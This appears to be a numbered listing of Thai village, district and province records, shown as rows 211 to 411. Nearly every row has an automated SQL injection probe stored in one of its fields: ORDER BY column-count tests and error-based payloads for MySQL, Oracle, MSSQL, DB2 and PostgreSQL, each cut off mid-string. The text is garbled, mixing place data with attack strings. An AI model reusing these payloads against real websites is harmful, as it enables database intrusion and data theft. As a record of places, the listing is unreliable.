211 ")) AND (SELECT 8146 FROM(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(8146=8146,1))),0x716a717 อำเภอ จังหวัด มิถุนายน 2565
212 ") AND (SELECT 8146 FROM(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(8146=8146,1))),0x716a7171 อำเภอ จังหวัด มิถุนายน 2565
213 0 อำเภอ จังหวัด มิถุนายน 2565
214 AND (SELECT 8146 FROM(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(8146=8146,1))),0x716a717171 อำเภอ จังหวัด มิถุนายน 2565
215 ))) AND (SELECT 8146 FROM(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(8146=8146,1))),0x716a717 อำเภอ จังหวัด มิถุนายน 2565
216 )) AND (SELECT 8146 FROM(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(8146=8146,1))),0x716a7171 อำเภอ จังหวัด มิถุนายน 2565
217 ) AND (SELECT 8146 FROM(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(8146=8146,1))),0x716a71717 อำเภอ จังหวัด มิถุนายน 2565
218 บ้านพันตน อำเภอ จังหวัด มิถุนายน 2565
219 บ้านพันตน อำเภอ จังหวัด
220 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม 2565
221 20111 น้ำปาย อำเภอ จังหวัด มิถุนายน 2565
222 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ 2556
223 16330 บ้า่นไฮ อำเภอ จังหวัด -4489 ORDER BY 5404# 2556
224 16330 บ้า่นไฮ อำเภอ จังหวัด -4714 ORDER BY 1# 2556
225 16330 บ้า่นไฮ อำเภอ จังหวัด -1257 ORDER BY 3120# 2556
226 16330 บ้า่นไฮ อำเภอ จังหวัด -5064 ORDER BY 1# 2556
227 16330 บ้า่นไฮ อำเภอ จังหวัด -7620" ORDER BY 9484# 2556
228 16330 บ้า่นไฮ อำเภอ จังหวัด -6618" ORDER BY 1# 2556
229 16330 บ้า่นไฮ อำเภอ จังหวัด -4020") ORDER BY 1320# 2556
230 16330 บ้า่นไฮ อำเภอ จังหวัด -5858") ORDER BY 1# 2556
231 16330 บ้า่นไฮ อำเภอ จังหวัด -9742" ORDER BY 7632# 2556
232 16330 บ้า่นไฮ อำเภอ จังหวัด -8625" ORDER BY 1# 2556
233 16330 บ้า่นไฮ อำเภอ จังหวัด -2006")) ORDER BY 1246# 2556
234 16330 บ้า่นไฮ อำเภอ จังหวัด -7774")) ORDER BY 1# 2556
235 16330 บ้า่นไฮ อำเภอ จังหวัด -6740") ORDER BY 9436# 2556
236 16330 บ้า่นไฮ อำเภอ จังหวัด -2632") ORDER BY 1# 2556
237 16330 บ้า่นไฮ อำเภอ จังหวัด -9085 ORDER BY 9555# 2556
238 16330 บ้า่นไฮ อำเภอ จังหวัด -9378 ORDER BY 1# 2556
239 16330 บ้า่นไฮ อำเภอ จังหวัด -9349))) ORDER BY 6538# 2556
240 16330 บ้า่นไฮ อำเภอ จังหวัด -8406))) ORDER BY 1# 2556
241 16330 บ้า่นไฮ อำเภอ จังหวัด -9317)) ORDER BY 6005# 2556
242 16330 บ้า่นไฮ อำเภอ จังหวัด -2671)) ORDER BY 1# 2556
243 16330 บ้า่นไฮ อำเภอ จังหวัด -5347) ORDER BY 9688# 2556
244 16330 บ้า่นไฮ อำเภอ จังหวัด -4914) ORDER BY 1# 2556
245 16330 บ้า่นไฮ อำเภอ จังหวัด -6188) ORDER BY 4166# 2556
246 16330 บ้า่นไฮ อำเภอ จังหวัด -1223) ORDER BY 1# 2556
247 16330 บ้า่นไฮ อำเภอ จังหวัด ORDER BY 8633# 2556
248 16330 บ้า่นไฮ อำเภอ จังหวัด ORDER BY 9598# 2556
249 16330 บ้า่นไฮ อำเภอ จังหวัด " ORDER BY 8820# 2556
250 16330 บ้า่นไฮ อำเภอ จังหวัด ") ORDER BY 7084# 2556
251 16330 บ้า่นไฮ อำเภอ จังหวัด " ORDER BY 7267# 2556
252 16330 บ้า่นไฮ อำเภอ จังหวัด " ORDER BY 1# 2556
253 16330 บ้า่นไฮ อำเภอ จังหวัด ")) ORDER BY 8908# 2556
254 16330 บ้า่นไฮ อำเภอ จังหวัด ")) ORDER BY 1# 2556
255 16330 บ้า่นไฮ อำเภอ จังหวัด ") ORDER BY 6498# 2556
256 16330 บ้า่นไฮ อำเภอ จังหวัด ") ORDER BY 1# 2556
257 16330 บ้า่นไฮ อำเภอ จังหวัด ORDER BY 7923# 2556
258 16330 บ้า่นไฮ อำเภอ จังหวัด ORDER BY 1# 2556
259 16330 บ้า่นไฮ อำเภอ จังหวัด ))) ORDER BY 5217# 2556
260 16330 บ้า่นไฮ อำเภอ จังหวัด ))) ORDER BY 1# 2556
261 16330 บ้า่นไฮ อำเภอ จังหวัด )) ORDER BY 1863# 2556
262 16330 บ้า่นไฮ อำเภอ จังหวัด )) ORDER BY 1# 2556
263 16330 บ้า่นไฮ อำเภอ จังหวัด ) ORDER BY 4007# 2556
264 16330 บ้า่นไฮ อำเภอ จังหวัด ) ORDER BY 1648# 2556
265 16330 บ้า่นไฮ อำเภอ จังหวัด ) ORDER BY 1# 2556
266 16330 บ้า่นไฮ อำเภอ จังหวัด -7741 ORDER BY 3895-- lYvS 2556
267 16330 บ้า่นไฮ อำเภอ จังหวัด -4040 ORDER BY 1-- nfaH 2556
268 16330 บ้า่นไฮ อำเภอ จังหวัด -1865 ORDER BY 2103-- NFrX 2556
269 16330 บ้า่นไฮ อำเภอ จังหวัด -6752 ORDER BY 1-- nYNB 2556
270 16330 บ้า่นไฮ อำเภอ จังหวัด -1725" ORDER BY 3905-- kCll 2556
271 16330 บ้า่นไฮ อำเภอ จังหวัด -6268" ORDER BY 1-- Tbpi 2556
272 16330 บ้า่นไฮ อำเภอ จังหวัด -9857") ORDER BY 6945-- ijuI 2556
273 16330 บ้า่นไฮ อำเภอ จังหวัด -1897") ORDER BY 1-- XPQX 2556
274 16330 บ้า่นไฮ อำเภอ จังหวัด -1542" ORDER BY 8730-- KHSi 2556
275 16330 บ้า่นไฮ อำเภอ จังหวัด -5183" ORDER BY 1-- CIrM 2556
276 16330 บ้า่นไฮ อำเภอ จังหวัด -9042")) ORDER BY 4446-- liha 2556
277 16330 บ้า่นไฮ อำเภอ จังหวัด -4275")) ORDER BY 1-- tTzF 2556
278 16330 บ้า่นไฮ อำเภอ จังหวัด -3969") ORDER BY 4800-- XcrG 2556
279 16330 บ้า่นไฮ อำเภอ จังหวัด -3290") ORDER BY 1-- qeCW 2556
280 16330 บ้า่นไฮ อำเภอ จังหวัด -4588 ORDER BY 8875-- zcMf 2556
281 16330 บ้า่นไฮ อำเภอ จังหวัด -7503 ORDER BY 1-- YQBX 2556
282 16330 บ้า่นไฮ อำเภอ จังหวัด -6115))) ORDER BY 2114-- AYeM 2556
283 16330 บ้า่นไฮ อำเภอ จังหวัด -5851))) ORDER BY 1-- iBCQ 2556
284 16330 บ้า่นไฮ อำเภอ จังหวัด -5669)) ORDER BY 5940-- KcbV 2556
285 16330 บ้า่นไฮ อำเภอ จังหวัด -9213)) ORDER BY 1-- tRWa 2556
286 16330 บ้า่นไฮ อำเภอ จังหวัด -9743) ORDER BY 4758-- XOZU 2556
287 16330 บ้า่นไฮ อำเภอ จังหวัด -5795) ORDER BY 1-- avPt 2556
288 16330 บ้า่นไฮ อำเภอ จังหวัด -5350) ORDER BY 6331-- chZe 2556
289 16330 บ้า่นไฮ อำเภอ จังหวัด -8643) ORDER BY 1-- RvIA 2556
290 16330 บ้า่นไฮ อำเภอ จังหวัด ORDER BY 8117-- zZME 2556
291 16330 บ้า่นไฮ อำเภอ จังหวัด ORDER BY 1-- pcWP 2556
292 16330 บ้า่นไฮ อำเภอ จังหวัด ORDER BY 9435-- IgBY 2556
293 16330 บ้า่นไฮ อำเภอ จังหวัด ORDER BY 1-- jtPq 2556
294 16330 บ้า่นไฮ อำเภอ จังหวัด " ORDER BY 6079-- trIG 2556
295 16330 บ้า่นไฮ อำเภอ จังหวัด " ORDER BY 1-- YZqB 2556
296 16330 บ้า่นไฮ อำเภอ จังหวัด ") ORDER BY 4155-- sylr 2556
297 16330 บ้า่นไฮ อำเภอ จังหวัด ") ORDER BY 1-- KJdG 2556
298 16330 บ้า่นไฮ อำเภอ จังหวัด " ORDER BY 5402-- hBCf 2556
299 16330 บ้า่นไฮ อำเภอ จังหวัด " ORDER BY 1-- SYGq 2556
300 16330 บ้า่นไฮ อำเภอ จังหวัด ")) ORDER BY 4910-- Fzpm 2556
301 16330 บ้า่นไฮ อำเภอ จังหวัด ")) ORDER BY 1-- qveb 2556
302 16330 บ้า่นไฮ อำเภอ จังหวัด ") ORDER BY 3251-- VTbX 2556
303 16330 บ้า่นไฮ อำเภอ จังหวัด ") ORDER BY 1-- LyyF 2556
304 16330 บ้า่นไฮ อำเภอ จังหวัด ORDER BY 2570-- AWrj 2556
305 16330 บ้า่นไฮ อำเภอ จังหวัด ORDER BY 1-- MKdf 2556
306 16330 บ้า่นไฮ อำเภอ จังหวัด ))) ORDER BY 7386-- bCSp 2556
307 16330 บ้า่นไฮ อำเภอ จังหวัด ))) ORDER BY 1-- HIdj 2556
308 16330 บ้า่นไฮ อำเภอ จังหวัด )) ORDER BY 8330-- TYTv 2556
309 16330 บ้า่นไฮ อำเภอ จังหวัด )) ORDER BY 1-- gXIP 2556
310 16330 บ้า่นไฮ อำเภอ จังหวัด ) ORDER BY 1538-- YgCt 2556
311 16330 บ้า่นไฮ อำเภอ จังหวัด ) ORDER BY 1-- jbBo 2556
312 16330 บ้า่นไฮ อำเภอ จังหวัด ) ORDER BY 5330-- VmBz 2556
313 16330 บ้า่นไฮ อำเภอ จังหวัด ) ORDER BY 1-- xgWG 2556
314 16330 บ้า่นไฮ อำเภอ จังหวัด SELECT CHAR(113,98,107,122,113)||(CASE WHEN (5039=5039) THEN 1 ELSE 0 END)||CHAR(113,106,112,113,11 2556
315 16330 บ้า่นไฮ อำเภอ จังหวัด (SELECT CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113)||(CASE WHEN (2544=2544) THEN TO_NUMBER(1) E 2556
316 16330 บ้า่นไฮ อำเภอ จังหวัด (SELECT CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113)+(CASE WHEN (4456=4456) THEN CHAR(49) ELSE 2556
317 16330 บ้า่นไฮ อำเภอ จังหวัด (SELECT (CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (3672=3672) THEN 1 EL 2556
318 16330 บ้า่นไฮ อำเภอ จังหวัด (SELECT CONCAT(0x71626b7a71,(ELT(9206=9206,1)),0x716a707171)) 2556
319 16330 บ้า่นไฮ อำเภอ จังหวัด ,(CAST((CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (3542=3542) THEN 1 ELS 2556
320 16330 บ้า่นไฮ อำเภอ จังหวัด ,(SELECT 6228 FROM (SELECT ROW(6228,8992)>(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (ELT(6228=62 2556
321 16330 บ้า่นไฮ อำเภอ จังหวัด ,EXTRACTVALUE(7441,CONCAT(0x5c,0x71626b7a71,(SELECT (ELT(7441=7441,1))),0x716a707171)) 2556
322 16330 บ้า่นไฮ อำเภอ จังหวัด (SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113)||(SELECT (C 2556
323 16330 บ้า่นไฮ อำเภอ จังหวัด (CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (9814=9814 2556
324 16330 บ้า่นไฮ อำเภอ จังหวัด (CAST((CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (2030=2030) THEN 1 ELSE 2556
325 16330 บ้า่นไฮ อำเภอ จังหวัด (EXTRACTVALUE(6139,CONCAT(0x5c,0x71626b7a71,(SELECT (ELT(6139=6139,1))),0x716a707171))) 2556
326 16330 บ้า่นไฮ อำเภอ จังหวัด (SELECT 7908 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (ELT(7908=7908,1))),0x716a707171,FLOO 2556
327 16330 บ้า่นไฮ อำเภอ จังหวัด " PROCEDURE ANALYSE(EXTRACTVALUE(2035,CONCAT(0x5c,0x71626b7a71,(SELECT (CASE WHEN (2035=2035) THEN 2556
328 16330 บ้า่นไฮ อำเภอ จังหวัด ")) PROCEDURE ANALYSE(EXTRACTVALUE(2035,CONCAT(0x5c,0x71626b7a71,(SELECT (CASE WHEN (2035=2035) THE 2556
329 16330 บ้า่นไฮ อำเภอ จังหวัด ") PROCEDURE ANALYSE(EXTRACTVALUE(2035,CONCAT(0x5c,0x71626b7a71,(SELECT (CASE WHEN (2035=2035) THEN 2556
330 16330 บ้า่นไฮ อำเภอ จังหวัด PROCEDURE ANALYSE(EXTRACTVALUE(2035,CONCAT(0x5c,0x71626b7a71,(SELECT (CASE WHEN (2035=2035) THEN 1 2556
331 16330 บ้า่นไฮ อำเภอ จังหวัด ))) PROCEDURE ANALYSE(EXTRACTVALUE(2035,CONCAT(0x5c,0x71626b7a71,(SELECT (CASE WHEN (2035=2035) THE 2556
332 16330 บ้า่นไฮ อำเภอ จังหวัด )) PROCEDURE ANALYSE(EXTRACTVALUE(2035,CONCAT(0x5c,0x71626b7a71,(SELECT (CASE WHEN (2035=2035) THEN 2556
333 16330 บ้า่นไฮ อำเภอ จังหวัด ) PROCEDURE ANALYSE(EXTRACTVALUE(2035,CONCAT(0x5c,0x71626b7a71,(SELECT (CASE WHEN (2035=2035) THEN 2556
334 16330 บ้า่นไฮ อำเภอ จังหวัด " AND 5291=RAISE_ERROR(CHR(55)||CHR(48)||CHR(48)||CHR(48)||CHR(49),CHR(113)||CHR(98)||CHR(107)||CHR 2556
335 16330 บ้า่นไฮ อำเภอ จังหวัด ")) AND 5291=RAISE_ERROR(CHR(55)||CHR(48)||CHR(48)||CHR(48)||CHR(49),CHR(113)||CHR(98)||CHR(107)||C 2556
336 16330 บ้า่นไฮ อำเภอ จังหวัด ") AND 5291=RAISE_ERROR(CHR(55)||CHR(48)||CHR(48)||CHR(48)||CHR(49),CHR(113)||CHR(98)||CHR(107)||CH 2556
337 16330 บ้า่นไฮ อำเภอ จังหวัด AND 5291=RAISE_ERROR(CHR(55)||CHR(48)||CHR(48)||CHR(48)||CHR(49),CHR(113)||CHR(98)||CHR(107)||CHR( 2556
338 16330 บ้า่นไฮ อำเภอ จังหวัด ))) AND 5291=RAISE_ERROR(CHR(55)||CHR(48)||CHR(48)||CHR(48)||CHR(49),CHR(113)||CHR(98)||CHR(107)||C 2556
339 16330 บ้า่นไฮ อำเภอ จังหวัด )) AND 5291=RAISE_ERROR(CHR(55)||CHR(48)||CHR(48)||CHR(48)||CHR(49),CHR(113)||CHR(98)||CHR(107)||CH 2556
340 16330 บ้า่นไฮ อำเภอ จังหวัด ) AND 5291=RAISE_ERROR(CHR(55)||CHR(48)||CHR(48)||CHR(48)||CHR(49),CHR(113)||CHR(98)||CHR(107)||CHR 2556
341 16330 บ้า่นไฮ อำเภอ จังหวัด " AND 4001=CAST((CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (4001=4001) T 2556
342 16330 บ้า่นไฮ อำเภอ จังหวัด ")) AND 4001=CAST((CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (4001=4001) 2556
343 16330 บ้า่นไฮ อำเภอ จังหวัด ") AND 4001=CAST((CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (4001=4001) 2556
344 16330 บ้า่นไฮ อำเภอ จังหวัด AND 4001=CAST((CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (4001=4001) TH 2556
345 16330 บ้า่นไฮ อำเภอ จังหวัด ))) AND 4001=CAST((CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (4001=4001) 2556
346 16330 บ้า่นไฮ อำเภอ จังหวัด )) AND 4001=CAST((CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (4001=4001) 2556
347 16330 บ้า่นไฮ อำเภอ จังหวัด ) AND 4001=CAST((CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (4001=4001) T 2556
348 16330 บ้า่นไฮ อำเภอ จังหวัด " AND 6549=(CODE(113)||CODE(98)||CODE(107)||CODE(122)||CODE(113)||(SELECT CASE 6549 WHEN 6549 THEN 2556
349 16330 บ้า่นไฮ อำเภอ จังหวัด ")) AND 6549=(CODE(113)||CODE(98)||CODE(107)||CODE(122)||CODE(113)||(SELECT CASE 6549 WHEN 6549 THE 2556
350 16330 บ้า่นไฮ อำเภอ จังหวัด ") AND 6549=(CODE(113)||CODE(98)||CODE(107)||CODE(122)||CODE(113)||(SELECT CASE 6549 WHEN 6549 THEN 2556
351 16330 บ้า่นไฮ อำเภอ จังหวัด AND 6549=(CODE(113)||CODE(98)||CODE(107)||CODE(122)||CODE(113)||(SELECT CASE 6549 WHEN 6549 THEN C 2556
352 16330 บ้า่นไฮ อำเภอ จังหวัด ))) AND 6549=(CODE(113)||CODE(98)||CODE(107)||CODE(122)||CODE(113)||(SELECT CASE 6549 WHEN 6549 THE 2556
353 16330 บ้า่นไฮ อำเภอ จังหวัด )) AND 6549=(CODE(113)||CODE(98)||CODE(107)||CODE(122)||CODE(113)||(SELECT CASE 6549 WHEN 6549 THEN 2556
354 16330 บ้า่นไฮ อำเภอ จังหวัด ) AND 6549=(CODE(113)||CODE(98)||CODE(107)||CODE(122)||CODE(113)||(SELECT CASE 6549 WHEN 6549 THEN 2556
355 16330 บ้า่นไฮ อำเภอ จังหวัด " AND 7092=CTXSYS.DRITHSX.SN(7092,(CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113)||(SELECT (CASE W 2556
356 16330 บ้า่นไฮ อำเภอ จังหวัด ")) AND 7092=CTXSYS.DRITHSX.SN(7092,(CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113)||(SELECT (CASE 2556
357 16330 บ้า่นไฮ อำเภอ จังหวัด ") AND 7092=CTXSYS.DRITHSX.SN(7092,(CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113)||(SELECT (CASE 2556
358 16330 บ้า่นไฮ อำเภอ จังหวัด AND 7092=CTXSYS.DRITHSX.SN(7092,(CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113)||(SELECT (CASE WH 2556
359 16330 บ้า่นไฮ อำเภอ จังหวัด ))) AND 7092=CTXSYS.DRITHSX.SN(7092,(CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113)||(SELECT (CASE 2556
360 16330 บ้า่นไฮ อำเภอ จังหวัด )) AND 7092=CTXSYS.DRITHSX.SN(7092,(CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113)||(SELECT (CASE 2556
361 16330 บ้า่นไฮ อำเภอ จังหวัด ) AND 7092=CTXSYS.DRITHSX.SN(7092,(CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113)||(SELECT (CASE W 2556
362 16330 บ้า่นไฮ อำเภอ จังหวัด " AND 7369=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113)||(SELECT (CA 2556
363 16330 บ้า่นไฮ อำเภอ จังหวัด ")) AND 7369=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113)||(SELECT ( 2556
364 16330 บ้า่นไฮ อำเภอ จังหวัด ") AND 7369=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113)||(SELECT (C 2556
365 16330 บ้า่นไฮ อำเภอ จังหวัด AND 7369=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113)||(SELECT (CAS 2556
366 16330 บ้า่นไฮ อำเภอ จังหวัด ))) AND 7369=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113)||(SELECT ( 2556
367 16330 บ้า่นไฮ อำเภอ จังหวัด )) AND 7369=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113)||(SELECT (C 2556
368 16330 บ้า่นไฮ อำเภอ จังหวัด ) AND 7369=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113)||(SELECT (CA 2556
369 16330 บ้า่นไฮ อำเภอ จังหวัด " AND 9251=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113)| 2556
370 16330 บ้า่นไฮ อำเภอ จังหวัด ")) AND 9251=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113 2556
371 16330 บ้า่นไฮ อำเภอ จังหวัด ") AND 9251=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113) 2556
372 16330 บ้า่นไฮ อำเภอ จังหวัด AND 9251=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113)|| 2556
373 16330 บ้า่นไฮ อำเภอ จังหวัด ))) AND 9251=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113 2556
374 16330 บ้า่นไฮ อำเภอ จังหวัด )) AND 9251=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113) 2556
375 16330 บ้า่นไฮ อำเภอ จังหวัด ) AND 9251=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113)| 2556
376 16330 บ้า่นไฮ อำเภอ จังหวัด " AND 9242=CONCAT(CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113),(SELECT (CASE WHEN (9242=9242) T 2556
377 16330 บ้า่นไฮ อำเภอ จังหวัด ")) AND 9242=CONCAT(CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113),(SELECT (CASE WHEN (9242=9242) 2556
378 16330 บ้า่นไฮ อำเภอ จังหวัด ") AND 9242=CONCAT(CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113),(SELECT (CASE WHEN (9242=9242) 2556
379 16330 บ้า่นไฮ อำเภอ จังหวัด AND 9242=CONCAT(CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113),(SELECT (CASE WHEN (9242=9242) TH 2556
380 16330 บ้า่นไฮ อำเภอ จังหวัด ))) AND 9242=CONCAT(CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113),(SELECT (CASE WHEN (9242=9242) 2556
381 16330 บ้า่นไฮ อำเภอ จังหวัด )) AND 9242=CONCAT(CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113),(SELECT (CASE WHEN (9242=9242) 2556
382 16330 บ้า่นไฮ อำเภอ จังหวัด ) AND 9242=CONCAT(CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113),(SELECT (CASE WHEN (9242=9242) T 2556
383 16330 บ้า่นไฮ อำเภอ จังหวัด " AND 7628=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN 2556
384 16330 บ้า่นไฮ อำเภอ จังหวัด ")) AND 7628=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113)+(SELECT (CASE WHE 2556
385 16330 บ้า่นไฮ อำเภอ จังหวัด ") AND 7628=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN 2556
386 16330 บ้า่นไฮ อำเภอ จังหวัด AND 7628=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN ( 2556
387 16330 บ้า่นไฮ อำเภอ จังหวัด ))) AND 7628=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113)+(SELECT (CASE WHE 2556
388 16330 บ้า่นไฮ อำเภอ จังหวัด )) AND 7628=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN 2556
389 16330 บ้า่นไฮ อำเภอ จังหวัด ) AND 7628=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN 2556
390 16330 บ้า่นไฮ อำเภอ จังหวัด " AND 8392 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (8392=83 2556
391 16330 บ้า่นไฮ อำเภอ จังหวัด ")) AND 8392 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (8392= 2556
392 16330 บ้า่นไฮ อำเภอ จังหวัด ") AND 8392 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (8392=8 2556
393 16330 บ้า่นไฮ อำเภอ จังหวัด AND 8392 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (8392=839 2556
394 16330 บ้า่นไฮ อำเภอ จังหวัด ))) AND 8392 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (8392= 2556
395 16330 บ้า่นไฮ อำเภอ จังหวัด )) AND 8392 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (8392=8 2556
396 16330 บ้า่นไฮ อำเภอ จังหวัด ) AND 8392 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(107)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (8392=83 2556
397 16330 บ้า่นไฮ อำเภอ จังหวัด " AND 3298=CAST((CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (3298=3298) T 2556
398 16330 บ้า่นไฮ อำเภอ จังหวัด ")) AND 3298=CAST((CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (3298=3298) 2556
399 16330 บ้า่นไฮ อำเภอ จังหวัด ") AND 3298=CAST((CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (3298=3298) 2556
400 16330 บ้า่นไฮ อำเภอ จังหวัด AND 3298=CAST((CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (3298=3298) TH 2556
401 16330 บ้า่นไฮ อำเภอ จังหวัด ))) AND 3298=CAST((CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (3298=3298) 2556
402 16330 บ้า่นไฮ อำเภอ จังหวัด )) AND 3298=CAST((CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (3298=3298) 2556
403 16330 บ้า่นไฮ อำเภอ จังหวัด ) AND 3298=CAST((CHR(113)||CHR(98)||CHR(107)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (3298=3298) T 2556
404 16330 บ้า่นไฮ อำเภอ จังหวัด " AND ROW(5217,5366)>(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (ELT(5217=5217,1))),0x716a707171, 2556
405 16330 บ้า่นไฮ อำเภอ จังหวัด ")) AND ROW(5217,5366)>(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (ELT(5217=5217,1))),0x716a70717 2556
406 16330 บ้า่นไฮ อำเภอ จังหวัด ") AND ROW(5217,5366)>(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (ELT(5217=5217,1))),0x716a707171 2556
407 16330 บ้า่นไฮ อำเภอ จังหวัด AND ROW(5217,5366)>(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (ELT(5217=5217,1))),0x716a707171,F 2556
408 16330 บ้า่นไฮ อำเภอ จังหวัด ))) AND ROW(5217,5366)>(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (ELT(5217=5217,1))),0x716a70717 2556
409 16330 บ้า่นไฮ อำเภอ จังหวัด )) AND ROW(5217,5366)>(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (ELT(5217=5217,1))),0x716a707171 2556
410 16330 บ้า่นไฮ อำเภอ จังหวัด ) AND ROW(5217,5366)>(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (ELT(5217=5217,1))),0x716a707171, 2556
411 16330 บ้า่นไฮ อำเภอ จังหวัด AND UPDATEXML(5506,CONCAT(0x2e,0x71626b7a71,(SELECT (ELT(5506=5506,1))),0x716a707171),4219)# MJNz 2556
